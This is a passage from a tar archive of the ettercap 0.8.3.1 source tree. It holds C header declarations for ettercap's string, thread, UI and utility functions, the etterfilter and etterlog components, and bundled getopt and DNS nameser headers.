017417 0ustar00rootroot000000 000000 #ifndef ETTERCAP_STRINGS_H #define ETTERCAP_STRINGS_H #ifdef HAVE_CTYPE_H #include #else extern int isprint(int c); #endif #ifndef HAVE_STRLCAT_FUNCTION #ifndef HAVE_STRLCAT #include #else #include #endif #else #include #endif #ifndef HAVE_STRLCPY_FUNCTION #ifndef HAVE_STRLCPY #include #else #include #endif #else #include #endif #ifndef HAVE_STRSEP #include #endif #ifndef HAVE_STRCASESTR #include #endif #ifndef HAVE_MEMMEM #include #endif #ifndef HAVE_MEMRCHR #include #endif #ifndef HAVE_BASENAME #include #endif EC_API_EXTERN int match_pattern(const char *s, const char *pattern); EC_API_EXTERN int base64_decode(char *bufplain, const char *bufcoded); EC_API_EXTERN int strescape(char *dst, char *src, size_t len); EC_API_EXTERN int str_replace(char **text, const char *s, const char *d); EC_API_EXTERN size_t strlen_utf8(const char *s); EC_API_EXTERN char * ec_strtok(char *s, const char *delim, char **ptrptr); EC_API_EXTERN char getchar_buffer(char **buf); EC_API_EXTERN int str_hex_to_bytes(char *string, u_char *bytes); EC_API_EXTERN char * str_tohex(u_char *bin, size_t len, char *dst, size_t dst_len); EC_API_EXTERN int ec_strsplit_ipport(char *input, char *ip, u_int16 *port); EC_API_EXTERN const char * ec_strlc(const char *input); EC_API_EXTERN const char * ec_struc(const char *input); #define strtok(x,y) DON_T_USE_STRTOK_DIRECTLY_USE__EC_STRTOK__INSTEAD #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_threads.h000664 000000 000000 00000003144 13711276346 017361 0ustar00rootroot000000 000000 #ifndef ETTERCAP_THREADS_H #define ETTERCAP_THREADS_H #include #include struct ec_thread { char *name; char *description; int detached; pthread_t id; }; #define PTHREAD_ID(id) (*(unsigned long*)&(id)) #define EC_THREAD_FUNC(x) void * x(void *args) #define EC_THREAD_PARAM args EC_API_EXTERN char * ec_thread_getname(pthread_t id); EC_API_EXTERN pthread_t ec_thread_getpid(char *name); EC_API_EXTERN char * ec_thread_getdesc(pthread_t id); EC_API_EXTERN void ec_thread_register_detached(pthread_t id, char *name, char *desc, int detached); EC_API_EXTERN void ec_thread_register(pthread_t id, char *name, char *desc); EC_API_EXTERN pthread_t ec_thread_new(char *name, char *desc, void *(*function)(void *), void *args); EC_API_EXTERN pthread_t ec_thread_new_detached(char *name, char *desc, void *(*function)(void *), void *args, int detached); EC_API_EXTERN void ec_thread_destroy(pthread_t id); EC_API_EXTERN void ec_thread_init(void); EC_API_EXTERN void ec_thread_kill_all(void); EC_API_EXTERN void ec_thread_exit(void); #define RETURN_IF_NOT_MAIN() do{ if (strcmp(ec_thread_getname(EC_PTHREAD_SELF), EC_GBL_PROGRAM)) return; }while(0) #define CANCELLATION_POINT() pthread_testcancel() #if defined(OS_DARWIN) || defined(OS_WINDOWS) || defined(OS_CYGWIN) /* XXX - darwin and windows are broken, pthread_join hangs up forever */ #define BROKEN_PTHREAD_JOIN #endif /* Mac OS X does not have it, and some other systems define it as enum */ #ifndef HAVE_MUTEX_RECURSIVE_NP #define PTHREAD_MUTEX_RECURSIVE_NP PTHREAD_MUTEX_RECURSIVE #endif #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_ui.h000664 000000 000000 00000004266 13711276346 016352 0ustar00rootroot000000 000000 #ifndef ETTERCAP_UI_H #define ETTERCAP_UI_H #include struct ui_ops { void (*init)(void); void (*start)(void); void (*cleanup)(void); void (*msg)(const char *msg); void (*error)(const char *msg); void (*fatal_error)(const char *msg); void (*input)(const char *title, char *input, size_t n, void (*callback)(void)); int (*progress)(char *title, int value, int max); #define UI_PROGRESS_INTERRUPTED -1 #define UI_PROGRESS_FINISHED 0 #define UI_PROGRESS_UPDATED 1 void (*update)(int); #define UI_UPDATE_HOSTLIST 1 #define UI_UPDATE_PLUGINLIST 2 char initialized; char type; #define UI_TEXT 0 #define UI_DAEMONIZE 1 #define UI_CURSES 2 #define UI_GTK 3 }; EC_API_EXTERN void ui_init(void); EC_API_EXTERN void ui_start(void); EC_API_EXTERN void ui_cleanup(void); EC_API_EXTERN void ui_msg(const char *fmt, ...); EC_API_EXTERN void ui_error(const char *fmt, ...); EC_API_EXTERN void ui_fatal_error(const char *msg); EC_API_EXTERN void ui_input(const char *title, char *input, size_t n, void (*callback)(void)); EC_API_EXTERN int ui_progress(char *title, int value, int max); EC_API_EXTERN void ui_update(int target); EC_API_EXTERN int ui_msg_flush(int max); #define MSG_ALL INT_MAX EC_API_EXTERN int ui_msg_purge_all(void); EC_API_EXTERN void ui_register(struct ui_ops *ops); #define USER_MSG(x, ...) ui_msg(x, ## __VA_ARGS__ ) #define INSTANT_USER_MSG(x, ...) do { ui_msg(x, ## __VA_ARGS__ ); ui_msg_flush(MSG_ALL); } while(0) #define FATAL_MSG(x, ...) do { ui_error(x, ## __VA_ARGS__ ); return (-E_FATAL); } while(0) /* * if we are using the text interface, exit with a fatal error, * else display a message and continue with the current GUI (curses or gtk) */ #define SEMIFATAL_ERROR(x, ...) do { \ if (!EC_GBL_UI->initialized || EC_GBL_UI->type == UI_TEXT || EC_GBL_UI->type == UI_DAEMONIZE) \ FATAL_ERROR(x, ## __VA_ARGS__); \ else \ FATAL_MSG(x, ## __VA_ARGS__); \ } while(0) #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_update.h000664 000000 000000 00000000210 13711276346 017200 0ustar00rootroot000000 000000 #ifndef ETTERCAP_UPDATE_H #define ETTERCAP_UPDATE_H EC_API_EXTERN void global_update(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ec_utils.h000664 000000 000000 00000001165 13711276346 017070 0ustar00rootroot000000 000000 #ifndef ETTERCAP_UTILS_H #define ETTERCAP_UTILS_H EC_API_EXTERN int expand_token(char *s, u_int max, void (*func)(void *t, u_int n), void *t ); EC_API_EXTERN int set_regex(char *regex); EC_API_EXTERN char **parse_iflist(char *list); EC_API_EXTERN void drop_privs(void); EC_API_EXTERN void regain_privs(void); EC_API_EXTERN void regain_privs_atexit(void); EC_API_EXTERN int base64encode(const char *inputbuf, char **outptr); EC_API_EXTERN int base64decode(const char *src, char **outptr); EC_API_EXTERN const char *ec_ctime(const struct timeval *tv); EC_API_EXTERN u_char *ec_plen_to_binary(size_t buflen, u_int16 plen); #endif ettercap-0.8.3.1/include/ec_version.h000664 000000 000000 00000000625 13711276346 017415 0ustar00rootroot000000 000000 #ifndef ETTERCAP_VERS_H #define ETTERCAP_VERS_H #define EC_VERSION "0.8.3.1" #define EC_VERSION_MAJOR 0 #define EC_VERSION_MINOR 8 #define EC_VERSION_REVISION 3 #define EC_VERSION_SUBREVISION 1 #ifndef PROGRAM #define PROGRAM "ettercap" #endif #define EC_COPYRIGHT "2001-2020" #define EC_AUTHORS "Ettercap Development Team" #endif /* EOF */ ettercap-0.8.3.1/include/ef.h000664 000000 000000 00000001037 13711276346 015651 0ustar00rootroot000000 000000 #ifndef ETTERFILTER_H #define ETTERFILTER_H #include #include #include struct ef_globals { char *source_file; char *output_file; u_int32 lineno; u_int8 debug; u_int8 suppress_warnings; }; /* in el_main.c */ extern struct ef_globals *ef_gbls; #define EF_GBL_OPTIONS ef_gbls #define EF_GBL ef_gbls EC_API_EXTERN void ef_globals_alloc(void); EC_API_EXTERN void ef_globals_free(void); EC_API_EXTERN void ef_exit(int code); #endif /* EL_H */ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ef_functions.h000664 000000 000000 00000005433 13711276346 017745 0ustar00rootroot000000 000000 #ifndef ETTERFILTER_FUNCTIONS_H #define ETTERFILTER_FUNCTIONS_H #include #include #define SCRIPT_ERROR(x, ...) FATAL_ERROR("\n[%s:%d]: "x, EF_GBL_OPTIONS->source_file, EF_GBL->lineno, ## __VA_ARGS__ ); #define WARNING(x) do { \ if (!EF_GBL_OPTIONS->suppress_warnings) \ FATAL_ERROR("\n[%s:%ld]: WARNING "x, EF_GBL_OPTIONS->source_file, (unsigned long)EF_GBL->lineno); \ else \ fprintf(stderr, "\n[%s:%ld]: WARNING "x, EF_GBL_OPTIONS->source_file, (unsigned long)EF_GBL->lineno); \ } while(0) /* ef_main */ EC_API_EXTERN void ef_debug(u_char level, const char *message, ...); /* ef_parser */ EC_API_EXTERN void parse_options(int argc, char **argv); /* ef_test */ EC_API_EXTERN void test_filter(char *filename); EC_API_EXTERN void print_fop(struct filter_op *fop, u_int32 eip); /* ef_syntax && ef_grammar */ EC_API_EXTERN int yyerror(const char *); /* ef_tables */ EC_API_EXTERN void load_tables(void); EC_API_EXTERN void load_constants(void); EC_API_EXTERN int get_virtualpointer(char *name, char *offname, u_int8 *level, u_int16 *offset, u_int8 *size); EC_API_EXTERN int get_constant(char *name, u_int32 *value); /* ef_encode */ EC_API_EXTERN int encode_offset(char *string, struct filter_op *fop); EC_API_EXTERN int encode_function(char *string, struct filter_op *fop); EC_API_EXTERN int encode_const(char *string, struct filter_op *fop); /* ef_output */ EC_API_EXTERN int write_output(void); /* ef_compiler */ struct block { union { struct instruction *ins; struct ifblock *ifb; } un; struct block *next; u_int8 type; #define BLK_INSTR 0 #define BLK_IFBLK 1 }; struct instruction { struct filter_op fop; }; struct ifblock { struct condition *conds; struct block *blk; struct block *elseblk; }; struct condition { struct filter_op fop; struct condition *next; u_int16 op; #define COND_AND 0 #define COND_OR 1 }; EC_API_EXTERN int compiler_set_root(struct block *blk); EC_API_EXTERN size_t compile_tree(struct filter_op **fop); EC_API_EXTERN struct block * compiler_add_instr(struct instruction *ins, struct block *blk); EC_API_EXTERN struct block * compiler_add_ifblk(struct ifblock *ifb, struct block *blk); EC_API_EXTERN struct instruction * compiler_create_instruction(struct filter_op *fop); EC_API_EXTERN struct condition * compiler_create_condition(struct filter_op *fop); EC_API_EXTERN struct condition * compiler_concat_conditions(struct condition *a, u_int16 op, struct condition *b); EC_API_EXTERN struct ifblock * compiler_create_ifblock(struct condition *conds, struct block *blk); EC_API_EXTERN struct ifblock * compiler_create_ifelseblock(struct condition *conds, struct block *blk, struct block *elseblk); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/ef_version.h000664 000000 000000 00000000170 13711276346 017413 0ustar00rootroot000000 000000 #ifndef ETTERFILTER_VERSION_H #define ETTERFILTER_VERSION_H #define PROGRAM "etterfilter" #endif /* EOF */ ettercap-0.8.3.1/include/el.h000664 000000 000000 00000002374 13711276346 015664 0ustar00rootroot000000 000000 #ifndef ETTERLOG_H #define ETTERLOG_H #include #include #include #include struct el_options { char concat:1; char analyze:1; char no_headers:1; char connections:1; char decode:1; char showmac:1; char showclient:1; char only_source:1; char only_dest:1; char only_local:1; char only_remote:1; char passwords:1; char color:1; char xml:1; char reverse:1; char regex:1; }; struct el_globals { struct log_global_header hdr; int (*format)(const u_char *, size_t, u_char *); char *user; char *logfile; gzFile fd; regex_t *regex; struct target_env *t; struct ip_addr client; struct el_options *options; }; /* in el_main.c */ extern struct el_globals *el_gbls; #define EL_GBL el_gbls #define EL_GBL_LOGFILE EL_GBL->logfile #define EL_GBL_LOG_FD EL_GBL->fd #define EL_GBL_OPTIONS EL_GBL->options #define EL_GBL_TARGET (EL_GBL->t) #define COL_RED 31 #define COL_GREEN 32 #define COL_YELLOW 33 #define COL_BLUE 34 #define COL_MAGENTA 35 #define COL_CYAN 36 EC_API_EXTERN void el_globals_alloc(void); EC_API_EXTERN void el_globals_free(void); EC_API_EXTERN void el_exit(int code); #endif /* EL_H */ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/el_functions.h000664 000000 000000 00000006034 13711276346 017751 0ustar00rootroot000000 000000 #ifndef ETTERLOG_FUNCTIONS_H #define ETTERLOG_FUNCTIONS_H #include #include /* el_parser */ EC_API_EXTERN void parse_options(int argc, char **argv); /* el_analyze */ EC_API_EXTERN void analyze(void); EC_API_EXTERN void create_hosts_list(void); /* el_main */ EC_API_EXTERN void progress(int value, int max); EC_API_EXTERN void set_color(int color); EC_API_EXTERN void reset_color(void); /* el_log */ EC_API_EXTERN void open_log(char *file); EC_API_EXTERN int get_header(struct log_global_header *hdr); EC_API_EXTERN int get_packet(struct log_header_packet *pck, u_char **buf); EC_API_EXTERN int get_info(struct log_header_info *inf, struct dissector_info *buf); EC_API_EXTERN void concatenate(int argc, char **argv); /* el_display */ EC_API_EXTERN void display(void); EC_API_EXTERN void set_display_regex(char *regex); /* el_conn */ EC_API_EXTERN void conn_table_create(void); EC_API_EXTERN void conn_table_display(void); EC_API_EXTERN void conn_decode(void); EC_API_EXTERN void filcon_compile(char *conn); EC_API_EXTERN int is_conn(struct log_header_packet *pck, int *versus); #define VERSUS_SOURCE 0 #define VERSUS_DEST 1 /* el_target */ EC_API_EXTERN void target_compile(char *target); EC_API_EXTERN int is_target_pck(struct log_header_packet *pck); EC_API_EXTERN int is_target_info(struct host_profile *hst); EC_API_EXTERN int find_user(struct host_profile *hst, char *user); /* el_profiles */ EC_API_EXTERN int profile_add_info(struct log_header_info *inf, struct dissector_info *buf); EC_API_EXTERN void *get_host_list_ptr(void); /* el_stream */ struct so_list { int side; struct packet_object po; TAILQ_ENTRY(so_list) next; }; struct so_offset { struct so_list *so_curr; size_t po_off; }; struct stream_object { TAILQ_HEAD (so_list_head, so_list) so_head; struct so_offset side1; struct so_offset side2; }; EC_API_EXTERN void stream_init(struct stream_object *so); EC_API_EXTERN int stream_add(struct stream_object *so, struct log_header_packet *pck, char *buf); EC_API_EXTERN struct so_list * stream_search(struct stream_object *so, const char *buf, size_t buflen, int mode); EC_API_EXTERN int stream_read(struct stream_object *so, u_char *buf, size_t size, int mode); #define STREAM_SIDE1 0 #define STREAM_SIDE2 ~0 EC_API_EXTERN int stream_move(struct stream_object *so, size_t offset, int whence, int mode); /* el_decode */ enum { APP_LAYER_TCP = 51, APP_LAYER_UDP = 52, }; #define FUNC_EXTRACTOR(func) int func(struct stream_object *so) #define FUNC_EXTRACTOR_PTR(func) int (*func)(struct stream_object *so) #define EXECUTE_EXTRACTOR(x, so, ret) do{ \ if (x) \ ret += x(so); \ }while(0) #define STREAM so EC_API_EXTERN int decode_stream(struct stream_object *so); #define STREAM_SKIPPED 0 #define STREAM_DECODED 1 EC_API_EXTERN void add_extractor(u_int8 level, u_int32 type, FUNC_EXTRACTOR_PTR(extractor)); EC_API_EXTERN void * get_extractor(u_int8 level, u_int32 type); EC_API_EXTERN int decode_to_file(char *host, char *proto, char *file); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/include/el_version.h000664 000000 000000 00000000153 13711276346 017422 0ustar00rootroot000000 000000 #ifndef ETTERLOG_VERSION_H #define ETTERLOG_VERSION_H #define PROGRAM "etterlog" #endif /* EOF */ ettercap-0.8.3.1/include/missing/000775 000000 000000 00000000000 13711276346 016556 5ustar00rootroot000000 000000 ettercap-0.8.3.1/include/missing/basename.h000664 000000 000000 00000000207 13711276346 020501 0ustar00rootroot000000 000000 #ifndef EC_API_EXTERN #error Move this header somewhere else #endif EC_API_EXTERN char * basename (const char *filename); /* EOF */ ettercap-0.8.3.1/include/missing/getopt.h000664 000000 000000 00000014400 13711276346 020230 0ustar00rootroot000000 000000 /* Declarations for getopt. Copyright (C) 1989,90,91,92,93,94,96,97,98,99 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #ifndef _GETOPT_H #ifndef __need_getopt # define _GETOPT_H 1 #endif /* If __GNU_LIBRARY__ is not already defined, either we are being used standalone, or this is the first header included in the source file. If we are being used with glibc, we need to include , but that does not exist if we are standalone. So: if __GNU_LIBRARY__ is not defined, include , which will pull in for us if it's from glibc. (Why ctype.h? It's guaranteed to exist and it doesn't flood the namespace with stuff the way some other headers do.) */ #if !defined __GNU_LIBRARY__ # include #endif #ifdef __cplusplus extern "C" { #endif /* For communication from `getopt' to the caller. When `getopt' finds an option that takes an argument, the argument value is returned here. Also, when `ordering' is RETURN_IN_ORDER, each non-option ARGV-element is returned here. */ extern char *optarg; /* Index in ARGV of the next element to be scanned. This is used for communication to and from the caller and for communication between successive calls to `getopt'. On entry to `getopt', zero means this is the first call; initialize. When `getopt' returns -1, this is the index of the first of the non-option elements that the caller should itself scan. Otherwise, `optind' communicates from one call to the next how much of ARGV has been scanned so far. */ extern int optind; /* Callers store zero here to inhibit the error message `getopt' prints for unrecognized options. */ extern int opterr; /* Set to an option character which was unrecognized. */ extern int optopt; #ifndef __need_getopt /* Describe the long-named options requested by the application. The LONG_OPTIONS argument to getopt_long or getopt_long_only is a vector of `struct option' terminated by an element containing a name which is zero. The field `has_arg' is: no_argument (or 0) if the option does not take an argument, required_argument (or 1) if the option requires an argument, optional_argument (or 2) if the option takes an optional argument. If the field `flag' is not NULL, it points to a variable that is set to the value given in the field `val' when the option is found, but left unchanged if the option is not found. To have a long-named option do something other than set an `int' to a compiled-in constant, such as set a value from `optarg', set the option's `flag' field to zero and its `val' field to a nonzero value (the equivalent single-letter option character, if there is one). For long options that have a zero `flag' field, `getopt' returns the contents of the `val' field. */ struct option { # if defined __STDC__ && __STDC__ const char *name; # else char *name; # endif /* has_arg can't be an enum because some compilers complain about type mismatches in all the code that assumes it is an int. */ int has_arg; int *flag; int val; }; /* Names for the values of the `has_arg' field of `struct option'. */ # define no_argument 0 # define required_argument 1 # define optional_argument 2 #endif /* need getopt */ /* Get definitions and prototypes for functions to process the arguments in ARGV (ARGC of them, minus the program name) for options given in OPTS. Return the option character from OPTS just read. Return -1 when there are no more options. For unrecognized options, or options missing arguments, `optopt' is set to the option letter, and '?' is returned. The OPTS string is a list of characters which are recognized option letters, optionally followed by colons, specifying that that letter takes an argument, to be placed in `optarg'. If a letter in OPTS is followed by two colons, its argument is optional. This behavior is specific to the GNU `getopt'. The argument `--' causes premature termination of argument scanning, explicitly telling `getopt' that there are no more options. If OPTS begins with `--', then non-option arguments are treated as arguments to the option '\0'. This behavior is specific to the GNU `getopt'. */ #if defined __STDC__ && __STDC__ # ifdef __GNU_LIBRARY__ /* Many other libraries have conflicting prototypes for getopt, with differences in the consts, in stdlib.h. To avoid compilation errors, only prototype getopt for the GNU C library. */ extern int getopt (int __argc, char *const *__argv, const char *__shortopts); # else /* not __GNU_LIBRARY__ */ extern int getopt (); # endif /* __GNU_LIBRARY__ */ # ifndef __need_getopt extern int getopt_long (int __argc, char *const *__argv, const char *__shortopts, const struct option *__longopts, int *__longind); extern int getopt_long_only (int __argc, char *const *__argv, const char *__shortopts, const struct option *__longopts, int *__longind); /* Internal only. Users should not call this directly. */ extern int _getopt_internal (int __argc, char *const *__argv, const char *__shortopts, const struct option *__longopts, int *__longind, int __long_only); # endif #else /* not __STDC__ */ extern int getopt (); # ifndef __need_getopt extern int getopt_long (); extern int getopt_long_only (); extern int _getopt_internal (); # endif #endif /* __STDC__ */ #ifdef __cplusplus } #endif /* Make sure we later can get all the definitions and declarations. */ #undef __need_getopt #endif /* getopt.h */ ettercap-0.8.3.1/include/missing/memmem.h000664 000000 000000 00000000322 13711276346 020201 0ustar00rootroot000000 000000 #ifndef EC_API_EXTERN #error Move this header somewhere else #endif EC_API_EXTERN void * memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen); /* EOF */ ettercap-0.8.3.1/include/missing/memrchr.h000664 000000 000000 00000000221 13711276346 020357 0ustar00rootroot000000 000000 #ifndef EC_API_EXTERN #error Move this header somewhere else #endif EC_API_EXTERN void *memrchr(const void *s, u_char c, size_t n); /* EOF */ ettercap-0.8.3.1/include/missing/nameser.h000664 000000 000000 00000050031 13711276346 020360 0ustar00rootroot000000 000000 /* * Copyright (c) 1983, 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * Copyright (c) 2004 by Internet Systems Consortium, Inc. ("ISC") * Copyright (c) 1996-1999 by Internet Software Consortium. * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS * ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE * CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL * DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR * PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS * ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS * SOFTWARE. */ /* * $BINDId: nameser.h,v 8.37 2000/03/30 21:16:49 vixie Exp $ */ #ifndef _ARPA_NAMESER_H_ #define _ARPA_NAMESER_H_ /*! \file */ #define BIND_4_COMPAT #include #if (!defined(BSD)) || (BSD < 199306) # include #else # include #endif #include /*% * Revision information. This is the release date in YYYYMMDD format. * It can change every day so the right thing to do with it is use it * in preprocessor commands such as "#if (__NAMESER > 19931104)". Do not * compare for equality; rather, use it to determine whether your libbind.a * contains a new enough lib/nameser/ to support the feature you need. */ #define __NAMESER 19991006 /*%< New interface version stamp. */ /* * Define constants based on RFC 883, RFC 1034, RFC 1035 */ #define NS_PACKETSZ 512 /*%< default UDP packet size */ #define NS_MAXDNAME 1025 /*%< maximum domain name */ #define NS_MAXMSG 65535 /*%< maximum message size */ #define NS_MAXCDNAME 255 /*%< maximum compressed domain name */ #define NS_MAXLABEL 63 /*%< maximum length of domain label */ #define NS_HFIXEDSZ 12 /*%< #/bytes of fixed data in header */ #define NS_QFIXEDSZ 4 /*%< #/bytes of fixed data in query */ #define NS_RRFIXEDSZ 10 /*%< #/bytes of fixed data in r record */ #define NS_INT32SZ 4 /*%< #/bytes of data in a u_int32_t */ #define NS_INT16SZ 2 /*%< #/bytes of data in a u_int16_t */ #define NS_INT8SZ 1 /*%< #/bytes of data in a u_int8_t */ #define NS_INADDRSZ 4 /*%< IPv4 T_A */ #define NS_IN6ADDRSZ 16 /*%< IPv6 T_AAAA */ #define NS_CMPRSFLGS 0xc0 /*%< Flag bits indicating name compression. */ #define NS_DEFAULTPORT 53 /*%< For both TCP and UDP. */ /* * These can be expanded with synonyms, just keep ns_parse.c:ns_parserecord() * in synch with it. */ typedef enum __ns_sect { ns_s_qd = 0, /*%< Query: Question. */ ns_s_zn = 0, /*%< Update: Zone. */ ns_s_an = 1, /*%< Query: Answer. */ ns_s_pr = 1, /*%< Update: Prerequisites. */ ns_s_ns = 2, /*%< Query: Name servers. */ ns_s_ud = 2, /*%< Update: Update. */ ns_s_ar = 3, /*%< Query|Update: Additional records. */ ns_s_max = 4 } ns_sect; /*% * This is a message handle. It is caller allocated and has no dynamic data. * This structure is intended to be opaque to all but ns_parse.c, thus the * leading _'s on the member names. Use the accessor functions, not the _'s. */ typedef struct __ns_msg { const u_char *_msg, *_eom; u_int16_t _id, _flags, _counts[ns_s_max]; const u_char *_sections[ns_s_max]; ns_sect _sect; int _rrnum; const u_char *_msg_ptr; } ns_msg; /* Private data structure - do not use from outside library. */ struct _ns_flagdata { int mask, shift; }; extern const struct _ns_flagdata _ns_flagdata[]; /* Accessor macros - this is part of the public interface. */ #define ns_msg_id(handle) ((handle)._id + 0) #define ns_msg_base(handle) ((handle)._msg + 0) #define ns_msg_end(handle) ((handle)._eom + 0) #define ns_msg_size(handle) ((handle)._eom - (handle)._msg) #define ns_msg_count(handle, section) ((handle)._counts[section] + 0) /*% * This is a parsed record. It is caller allocated and has no dynamic data. */ typedef struct __ns_rr { char name[NS_MAXDNAME]; u_int16_t type; u_int16_t rr_class; u_int32_t ttl; u_int16_t rdlength; const u_char * rdata; } ns_rr; /* Accessor macros - this is part of the public interface. */ #define ns_rr_name(rr) (((rr).name[0] != '\0') ? (rr).name : ".") #define ns_rr_type(rr) ((ns_type)((rr).type + 0)) #define ns_rr_class(rr) ((ns_class)((rr).rr_class + 0)) #define ns_rr_ttl(rr) ((rr).ttl + 0) #define ns_rr_rdlen(rr) ((rr).rdlength + 0) #define ns_rr_rdata(rr) ((rr).rdata + 0) /*% * These don't have to be in the same order as in the packet flags word, * and they can even overlap in some cases, but they will need to be kept * in synch with ns_parse.c:ns_flagdata[]. */ typedef enum __ns_flag { ns_f_qr, /*%< Question/Response. */ ns_f_opcode, /*%< Operation code. */ ns_f_aa, /*%< Authoritative Answer. */ ns_f_tc, /*%< Truncation occurred. */ ns_f_rd, /*%< Recursion Desired. */ ns_f_ra, /*%< Recursion Available. */ ns_f_z, /*%< MBZ. */ ns_f_ad, /*%< Authentic Data (DNSSEC). */ ns_f_cd, /*%< Checking Disabled (DNSSEC). */ ns_f_rcode, /*%< Response code. */ ns_f_max } ns_flag; /*% * Currently defined opcodes. */ typedef enum __ns_opcode { ns_o_query = 0, /*%< Standard query. */ ns_o_iquery = 1, /*%< Inverse query (deprecated/unsupported). */ ns_o_status = 2, /*%< Name server status query (unsupported). */ /* Opcode 3 is undefined/reserved. */ ns_o_notify = 4, /*%< Zone change notification. */ ns_o_update = 5, /*%< Zone update message. */ ns_o_max = 6 } ns_opcode; /*% * Currently defined response codes. */ typedef enum __ns_rcode { ns_r_noerror = 0, /*%< No error occurred. */ ns_r_formerr = 1, /*%< Format error. */ ns_r_servfail = 2, /*%< Server failure. */ ns_r_nxdomain = 3, /*%< Name error. */ ns_r_notimpl = 4, /*%< Unimplemented. */ ns_r_refused = 5, /*%< Operation refused. */ /* these are for BIND_UPDATE */ ns_r_yxdomain = 6, /*%< Name exists */ ns_r_yxrrset = 7, /*%< RRset exists */ ns_r_nxrrset = 8, /*%< RRset does not exist */ ns_r_notauth = 9, /*%< Not authoritative for zone */ ns_r_notzone = 10, /*%< Zone of record different from zone section */ ns_r_max = 11, /* The following are EDNS extended rcodes */ ns_r_badvers = 16, /* The following are TSIG errors */ ns_r_badsig = 16, ns_r_badkey = 17, ns_r_badtime = 18 } ns_rcode; /* BIND_UPDATE */ typedef enum __ns_update_operation { ns_uop_delete = 0, ns_uop_add = 1, ns_uop_max = 2 } ns_update_operation; /*% * This structure is used for TSIG authenticated messages */ struct ns_tsig_key { char name[NS_MAXDNAME], alg[NS_MAXDNAME]; unsigned char *data; int len; }; typedef struct ns_tsig_key ns_tsig_key; /*% * This structure is used for TSIG authenticated TCP messages */ struct ns_tcp_tsig_state { int counter; struct dst_key *key; void *ctx; unsigned char sig[NS_PACKETSZ]; int siglen; }; typedef struct ns_tcp_tsig_state ns_tcp_tsig_state; #define NS_TSIG_FUDGE 300 #define NS_TSIG_TCP_COUNT 100 #define NS_TSIG_ALG_HMAC_MD5 "HMAC-MD5.SIG-ALG.REG.INT" #define NS_TSIG_ERROR_NO_TSIG -10 #define NS_TSIG_ERROR_NO_SPACE -11 #define NS_TSIG_ERROR_FORMERR -12 /*% * Currently defined type values for resources and queries. */ typedef enum __ns_type { ns_t_invalid = 0, /*%< Cookie. */ ns_t_a = 1, /*%< Host address. */ ns_t_ns = 2, /*%< Authoritative server. */ ns_t_md = 3, /*%< Mail destination. */ ns_t_mf = 4, /*%< Mail forwarder. */ ns_t_cname = 5, /*%< Canonical name. */ ns_t_soa = 6, /*%< Start of authority zone. */ ns_t_mb = 7, /*%< Mailbox domain name. */ ns_t_mg = 8, /*%< Mail group member. */ ns_t_mr = 9, /*%< Mail rename name. */ ns_t_null = 10, /*%< Null resource record. */ ns_t_wks = 11, /*%< Well known service. */ ns_t_ptr = 12, /*%< Domain name pointer. */ ns_t_hinfo = 13, /*%< Host information. */ ns_t_minfo = 14, /*%< Mailbox information. */ ns_t_mx = 15, /*%< Mail routing information. */ ns_t_txt = 16, /*%< Text strings. */ ns_t_rp = 17, /*%< Responsible person. */ ns_t_afsdb = 18, /*%< AFS cell database. */ ns_t_x25 = 19, /*%< X_25 calling address. */ ns_t_isdn = 20, 